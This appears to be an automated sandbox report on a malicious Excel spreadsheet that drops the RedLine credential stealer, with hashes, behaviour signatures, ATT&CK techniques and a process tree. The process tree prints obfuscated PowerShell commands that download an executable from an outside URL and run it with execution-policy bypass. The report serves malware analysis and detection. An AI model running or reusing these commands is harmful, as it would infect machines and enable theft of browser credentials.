Analysis

  • max time kernel
    149s
  • max time network
    92s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    10-02-2021 07:49

General

  • Target

    order_list_fe99087.xls

  • Size

    221KB

  • MD5

    aeb9b7f6fb7bac0deac61db8295e1d3c

  • SHA1

    823814c91d8c75933f0f49cda5b07ac14e484390

  • SHA256

    ce07dc9b67f4e91fb0254421599c3344f60732b99c24d39d4f2a5b8e93da56ef

  • SHA512

    cc3c349fdb18bbac96f36cff152c8c4873d10179cc6dab06863ac421ffc9b8d75f67c991522eaea736bc58aef3a7c172811e12f3ae08e4ebe6e32417456e936c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://urgfuid.gq/z/z.exe

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\order_list_fe99087.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:276
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('http://urgfuid.gq/z/z.exe','z.exe')
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1804
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -w 1 Start-Sleep 20; Move-Item "z.exe" -Destination "${enV`:appdata}"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1728
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -w 1 -EP bypass Start-Sleep 25; cd ${enV`:appdata};.('.'+'/z.exe')
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1792
      • C:\Users\Admin\AppData\Roaming\z.exe
        "C:\Users\Admin\AppData\Roaming\z.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:868
        • C:\Users\Admin\AppData\Local\Temp\o.exe
          "C:\Users\Admin\AppData\Local\Temp\o.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:632

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Collection

Data from Local System

1
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3bf4f350-86fe-486e-8b87-41ab96d0ad9c
    MD5

    b6d38f250ccc9003dd70efd3b778117f

    SHA1

    d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

    SHA256

    4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

    SHA512

    67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4408bb97-19ee-4815-b02c-5a0939dddad8
    MD5

    df44874327d79bd75e4264cb8dc01811

    SHA1

    1396b06debed65ea93c24998d244edebd3c0209d

    SHA256

    55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

    SHA512

    95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_644b5728-e9b5-45ab-9104-7136ec814422
    MD5

    be4d72095faf84233ac17b94744f7084

    SHA1

    cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

    SHA256

    b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

    SHA512

    43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6532a425-51ae-4577-837f-c6e09d9fcfcf
    MD5

    75a8da7754349b38d64c87c938545b1b

    SHA1

    5c28c257d51f1c1587e29164cc03ea880c21b417

    SHA256

    bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

    SHA512

    798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_69670b6c-d49a-42a9-993a-10d18807f7c6
    MD5

    5e3c7184a75d42dda1a83606a45001d8

    SHA1

    94ca15637721d88f30eb4b6220b805c5be0360ed

    SHA256

    8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

    SHA512

    fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f45a795-9723-4ae3-b7ea-79ea7f92b87a
    MD5

    a725bb9fafcf91f3c6b7861a2bde6db2

    SHA1

    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

    SHA256

    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

    SHA512

    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7f45a795-9723-4ae3-b7ea-79ea7f92b87a
    MD5

    a725bb9fafcf91f3c6b7861a2bde6db2

    SHA1

    8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

    SHA256

    51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

    SHA512

    1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_aacd219d-c7ba-43ff-a67c-9ddc2f632d63
    MD5

    597009ea0430a463753e0f5b1d1a249e

    SHA1

    4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

    SHA256

    3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

    SHA512

    5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e9f9468a-8cbd-4472-b808-e8b3772f4134
    MD5

    02ff38ac870de39782aeee04d7b48231

    SHA1

    0390d39fa216c9b0ecdb38238304e518fb2b5095

    SHA256

    fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

    SHA512

    24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    766426649070bb2f21e7b1b7faa57edd

    SHA1

    2f96337773317ce76e698b8aa7302aa3243cc470

    SHA256

    041164430b15b79c36fb8c8d02c6fdbe88506fc94ea9d278d3a6f316c9be564a

    SHA512

    c5b8a8cd098d08764f4765ca2cdb5ff4607e693511dddb2006a150dcf243ded87c67b780ab75b71f0e241692937b012d0a1a1c9a3d77047d317a72ec173a689a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    7dce8a60f8134698bffb6d76af0e6e8e

    SHA1

    2f553d581d8300a5c1f66420fd8fe702b4ad5cc1

    SHA256

    501e8d9089f2fc41ca8d8b512d0a5287b559629367dab99752dfffeff7097310

    SHA512

    1e476be8ca1db7f029e4506c8fdf1ef74eb3f9a9d53206808b08ceefecce2432ff21ce932b2f459df9053451a5876a0fcc4b4ed47ecd98b1b17e7126e92a6482

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    MD5

    056f8e00866f31ee5f8a2a7c2a03d7d2

    SHA1

    09ff823fe929e88e7ba8cf17db253704bd598013

    SHA256

    1e9361a526e9c6d65d205ac6fd35b698771b9f155abb3ba19d76b09f80dfa4b2

    SHA512

    a7d5988836324d0a5c750d46dd556eadaa93ad528b5ac794b7ad879f7bb166f7e089206c508f763c4e2275874c2efcf98505f3dc12403dee71cdd242ab12d93c

  • C:\Users\Admin\AppData\Local\Temp\o.exe
    MD5

    f254515cdf3cf10e1555046493c5bee8

    SHA1

    4eee393ad747349fda88bf5690dbb60aa450eced

    SHA256

    24be4bd66f7e47dee0a64925c1ceee243396c06d18c00fb16ce54204cb9b096e

    SHA512

    c6e06be4c7b9150e99d1708b6b45153de4d850490274ea6672177bcbbdde676aed3a2a038dd14936b54b68bcc46f7fdc382db82a26b5776e9ca81d6dc14362b1

  • C:\Users\Admin\AppData\Local\Temp\o.exe
    MD5

    f254515cdf3cf10e1555046493c5bee8

    SHA1

    4eee393ad747349fda88bf5690dbb60aa450eced

    SHA256

    24be4bd66f7e47dee0a64925c1ceee243396c06d18c00fb16ce54204cb9b096e

    SHA512

    c6e06be4c7b9150e99d1708b6b45153de4d850490274ea6672177bcbbdde676aed3a2a038dd14936b54b68bcc46f7fdc382db82a26b5776e9ca81d6dc14362b1

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    MD5

    d6d8b920f8250274a8a47e7f60ddeeaa

    SHA1

    a331013a7d48bce847309555ca967150a049431e

    SHA256

    f9daef7b310c3d39a985872a289bb351b2692debf76ce581a2ef043d78a604ec

    SHA512

    2ee578ebb22d1bbe3460c2a34e59b1071141a4eeef87e96fdf1fbca33a9403d8b08635f27dc2a8c542bc76843a0b9ae12c74d8c5246e1a017daa2d07d7995252

  • C:\Users\Admin\AppData\Roaming\z.exe
    MD5

    feb57ff3d961685dc7a12fcb2ef8ba63

    SHA1

    9fbceb22b3468083f3aa583e4183f4c9e407bcd9

    SHA256

    97059b74b76a880fae49ca4bfa64953cb694e60195a387018440066e5c0cf853

    SHA512

    8d61eac914c1cfc296e898772505a3646ede92e20855da5e5d0271fc856143a486f3efde7172ae09b46a4cbdfd37d547afddb86f3e5946a460372986fa0759a8

  • C:\Users\Admin\Documents\z.exe
    MD5

    feb57ff3d961685dc7a12fcb2ef8ba63

    SHA1

    9fbceb22b3468083f3aa583e4183f4c9e407bcd9

    SHA256

    97059b74b76a880fae49ca4bfa64953cb694e60195a387018440066e5c0cf853

    SHA512

    8d61eac914c1cfc296e898772505a3646ede92e20855da5e5d0271fc856143a486f3efde7172ae09b46a4cbdfd37d547afddb86f3e5946a460372986fa0759a8

  • \Users\Admin\AppData\Local\Temp\o.exe
    MD5

    f254515cdf3cf10e1555046493c5bee8

    SHA1

    4eee393ad747349fda88bf5690dbb60aa450eced

    SHA256

    24be4bd66f7e47dee0a64925c1ceee243396c06d18c00fb16ce54204cb9b096e

    SHA512

    c6e06be4c7b9150e99d1708b6b45153de4d850490274ea6672177bcbbdde676aed3a2a038dd14936b54b68bcc46f7fdc382db82a26b5776e9ca81d6dc14362b1

  • \Users\Admin\AppData\Roaming\z.exe
    MD5

    feb57ff3d961685dc7a12fcb2ef8ba63

    SHA1

    9fbceb22b3468083f3aa583e4183f4c9e407bcd9

    SHA256

    97059b74b76a880fae49ca4bfa64953cb694e60195a387018440066e5c0cf853

    SHA512

    8d61eac914c1cfc296e898772505a3646ede92e20855da5e5d0271fc856143a486f3efde7172ae09b46a4cbdfd37d547afddb86f3e5946a460372986fa0759a8

  • \Users\Admin\AppData\Roaming\z.exe
    MD5

    feb57ff3d961685dc7a12fcb2ef8ba63

    SHA1

    9fbceb22b3468083f3aa583e4183f4c9e407bcd9

    SHA256

    97059b74b76a880fae49ca4bfa64953cb694e60195a387018440066e5c0cf853

    SHA512

    8d61eac914c1cfc296e898772505a3646ede92e20855da5e5d0271fc856143a486f3efde7172ae09b46a4cbdfd37d547afddb86f3e5946a460372986fa0759a8

  • \Users\Admin\AppData\Roaming\z.exe
    MD5

    feb57ff3d961685dc7a12fcb2ef8ba63

    SHA1

    9fbceb22b3468083f3aa583e4183f4c9e407bcd9

    SHA256

    97059b74b76a880fae49ca4bfa64953cb694e60195a387018440066e5c0cf853

    SHA512

    8d61eac914c1cfc296e898772505a3646ede92e20855da5e5d0271fc856143a486f3efde7172ae09b46a4cbdfd37d547afddb86f3e5946a460372986fa0759a8

  • memory/276-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/276-2-0x000000002FBB1000-0x000000002FBB4000-memory.dmp
    Filesize

    12KB

  • memory/276-3-0x00000000715E1000-0x00000000715E3000-memory.dmp
    Filesize

    8KB

  • memory/632-85-0x0000000000000000-mapping.dmp
  • memory/632-90-0x0000000000C00000-0x0000000000C02000-memory.dmp
    Filesize

    8KB

  • memory/632-91-0x0000000000C06000-0x0000000000C25000-memory.dmp
    Filesize

    124KB

  • memory/632-89-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp
    Filesize

    9.6MB

  • memory/632-88-0x000007FEF56F0000-0x000007FEF608D000-memory.dmp
    Filesize

    9.6MB

  • memory/868-74-0x0000000003CD0000-0x0000000003CE1000-memory.dmp
    Filesize

    68KB

  • memory/868-70-0x0000000000000000-mapping.dmp
  • memory/868-83-0x0000000006564000-0x0000000006566000-memory.dmp
    Filesize

    8KB

  • memory/868-82-0x0000000006563000-0x0000000006564000-memory.dmp
    Filesize

    4KB

  • memory/868-80-0x0000000006561000-0x0000000006562000-memory.dmp
    Filesize

    4KB

  • memory/868-79-0x0000000000400000-0x0000000000439000-memory.dmp
    Filesize

    228KB

  • memory/868-81-0x0000000006562000-0x0000000006563000-memory.dmp
    Filesize

    4KB

  • memory/868-78-0x00000000002B0000-0x00000000002E6000-memory.dmp
    Filesize

    216KB

  • memory/868-77-0x0000000003E10000-0x0000000003E3A000-memory.dmp
    Filesize

    168KB

  • memory/868-76-0x0000000002290000-0x00000000022BC000-memory.dmp
    Filesize

    176KB

  • memory/868-75-0x000000006C550000-0x000000006CC3E000-memory.dmp
    Filesize

    6.9MB

  • memory/868-73-0x0000000003AE0000-0x0000000003AF1000-memory.dmp
    Filesize

    68KB

  • memory/1728-65-0x00000000061A0000-0x00000000061A1000-memory.dmp
    Filesize

    4KB

  • memory/1728-8-0x00000000765E1000-0x00000000765E3000-memory.dmp
    Filesize

    8KB

  • memory/1728-6-0x0000000000000000-mapping.dmp
  • memory/1728-12-0x000000006C4A0000-0x000000006CB8E000-memory.dmp
    Filesize

    6.9MB

  • memory/1728-15-0x0000000000E90000-0x0000000000E91000-memory.dmp
    Filesize

    4KB

  • memory/1728-21-0x0000000004790000-0x0000000004791000-memory.dmp
    Filesize

    4KB

  • memory/1728-27-0x0000000002680000-0x0000000002681000-memory.dmp
    Filesize

    4KB

  • memory/1728-25-0x0000000004792000-0x0000000004793000-memory.dmp
    Filesize

    4KB

  • memory/1792-22-0x0000000004930000-0x0000000004931000-memory.dmp
    Filesize

    4KB

  • memory/1792-7-0x0000000000000000-mapping.dmp
  • memory/1792-18-0x0000000004970000-0x0000000004971000-memory.dmp
    Filesize

    4KB

  • memory/1792-26-0x0000000004932000-0x0000000004933000-memory.dmp
    Filesize

    4KB

  • memory/1792-67-0x00000000064D0000-0x00000000064D1000-memory.dmp
    Filesize

    4KB

  • memory/1792-13-0x000000006C4A0000-0x000000006CB8E000-memory.dmp
    Filesize

    6.9MB

  • memory/1804-35-0x0000000006190000-0x0000000006191000-memory.dmp
    Filesize

    4KB

  • memory/1804-41-0x0000000006400000-0x0000000006401000-memory.dmp
    Filesize

    4KB

  • memory/1804-48-0x0000000006390000-0x0000000006391000-memory.dmp
    Filesize

    4KB

  • memory/1804-40-0x00000000061D0000-0x00000000061D1000-memory.dmp
    Filesize

    4KB

  • memory/1804-24-0x0000000001032000-0x0000000001033000-memory.dmp
    Filesize

    4KB

  • memory/1804-14-0x000000006C4A0000-0x000000006CB8E000-memory.dmp
    Filesize

    6.9MB

  • memory/1804-30-0x0000000005280000-0x0000000005281000-memory.dmp
    Filesize

    4KB

  • memory/1804-64-0x000000007EF20000-0x000000007EF21000-memory.dmp
    Filesize

    4KB

  • memory/1804-56-0x0000000006550000-0x0000000006551000-memory.dmp
    Filesize

    4KB

  • memory/1804-23-0x0000000001030000-0x0000000001031000-memory.dmp
    Filesize

    4KB

  • memory/1804-5-0x0000000000000000-mapping.dmp